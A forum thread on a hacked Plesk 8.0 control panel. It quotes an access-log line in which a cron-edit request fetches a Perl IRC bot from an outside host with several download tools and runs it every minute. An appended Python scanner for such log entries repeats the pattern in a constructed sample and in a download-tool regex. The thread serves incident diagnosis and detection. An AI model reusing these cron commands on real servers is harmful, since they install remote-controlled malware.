
Security Violation plesk 8.0.X

stewartrose

Guest
Just for interest..

Hacked through Plesk control panel.

httpsd_access_log:xxx.xxx.xxx.xxx - - [26/May/2007:00:00:24 +0100] "POST /sysuser/crontab_edit.php?cmd=update&cte_enabled=true&cte_minute=*&cte_hour=*&cte_dom=*&cte_month=*&cte_dow=*&cte_cmd=cd%20/usr/local/lib/;killall%20-9%20perl;rm%20-rf%20flaviu;curl%20-O%20http://flaviu.ro/flaviu;wget%20http://flaviu.ro/flaviu;lynx%20-source%20http://flaviu.ro/flaviu;fetch%20www.flaviu.ro/flaviu;GET%20http://flaviu.ro/flaviu;perl%20flaviu;rm%20-rf%20x* HTTP/1.1" 200 366

All the best from Alan
 
That's a risk you take whenever you allow a user to modify cron. They can execute any command on the system that they want.

What happened there is that someone with a valid logon set up a cron job to download that script (an irc zombie bot) and run it.
 
Hi atomicturtle,

Not quite, no one has access to the cp but me, and my passwords are very strong, the code given uploads data through the exploit..

all the best from Alan
 
Then it's possible your desktop has been compromised. You cannot access the cron settings without being logged into the CP.
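
Added example, not part of the thread or of Plesk: a small Python check an administrator could run over the panel access log to surface cron updates like the one quoted in the first post. The function names, the reason strings and the sample lines (placeholder addresses and hosts) are constructed for illustration; the parameter names come from the logged request.

```python
import re
from urllib.parse import unquote_plus

# Combined-format request line; a grep "file:" prefix on the address is tolerated.
REQUEST_RE = re.compile(r'(?P<src>\S+) .*?\[(?P<ts>[^\]]+)\] '
                        r'"(?P<method>[A-Z]+) (?P<target>.+) HTTP/[\d.]+" (?P<status>\d{3})')
SCHEDULE = ("cte_minute", "cte_hour", "cte_dom", "cte_month", "cte_dow")
# Download tools named in the logged command from the thread.
FETCHERS = re.compile(r"(?:^|[;&|\s])(curl|wget|lynx|fetch|GET)\s")

def review(line):
    """Return a finding for a suspicious cron update request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    if not path.endswith("/crontab_edit.php"):
        return None
    # Split on "&" only: the command itself contains ";" separators.
    params = {k: unquote_plus(v)
              for k, _, v in (p.partition("=") for p in query.split("&") if p)}
    if params.get("cmd") != "update":
        return None
    command = params.get("cte_cmd", "")
    reasons = []
    if FETCHERS.search(command):
        reasons.append("downloads remote content")
    if re.search(r";|&&|\|", command):
        reasons.append("chains several commands")
    if all(params.get(field) == "*" for field in SCHEDULE):
        reasons.append("scheduled every minute")
    if not reasons:
        return None
    return {"src": m["src"], "time": m["ts"], "status": int(m["status"]),
            "command": command, "reasons": reasons}

def scan(lines):
    return [finding for finding in map(review, lines) if finding]

# Constructed sample lines (addresses and hosts are placeholders).
CRON = "/sysuser/crontab_edit.php?cmd=update&cte_enabled=true"
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2024:00:00:24 +0000] "POST ' + CRON +
    '&cte_minute=*&cte_hour=*&cte_dom=*&cte_month=*&cte_dow=*'
    '&cte_cmd=cd%20/tmp;wget%20http://payload.example/bot;perl%20bot HTTP/1.1" 200 366',
    '198.51.100.9 - - [01/Jan/2024:09:12:01 +0000] "POST ' + CRON +
    '&cte_minute=0&cte_hour=3&cte_dom=*&cte_month=*&cte_dow=*'
    '&cte_cmd=/usr/bin/php%20/var/www/vhosts/site.example/cron.php HTTP/1.1" 200 366',
    '198.51.100.9 - - [01/Jan/2024:09:12:05 +0000] "GET /favicon.ico HTTP/1.1" 200 1200',
]
```

The check only works because the cron parameters appear in the URL of the logged request; values sent in a POST body are not written to a standard access log.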
 
